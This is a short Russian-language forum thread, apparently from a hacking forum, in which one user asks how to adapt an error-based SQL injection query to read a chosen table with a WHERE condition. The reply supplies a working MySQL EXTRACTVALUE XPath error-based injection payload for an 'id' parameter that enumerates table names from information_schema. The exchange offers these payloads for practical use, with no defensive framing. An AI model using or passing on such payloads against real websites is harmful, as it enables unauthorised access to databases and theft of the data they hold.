30.03.2018, 04:40
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
↑
парни, подскажите как этот запрос переделать, чтобы вывести инфу из нужной таблицы с условием where ?
Код:
id=1+AND+EXTRACTVALUE(22,CONCAT(0x5c,version(),(SELECT+(ELT(1=1,1))),database()))--+1
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+AND+[/COLOR][COLOR="#0000BB"]EXTRACTVALUE[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CONCAT[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x5c[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]table_schema[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'information_schema'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])))--+[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
XPATH-Error-Based-Injection-Extractvalue
|
|
|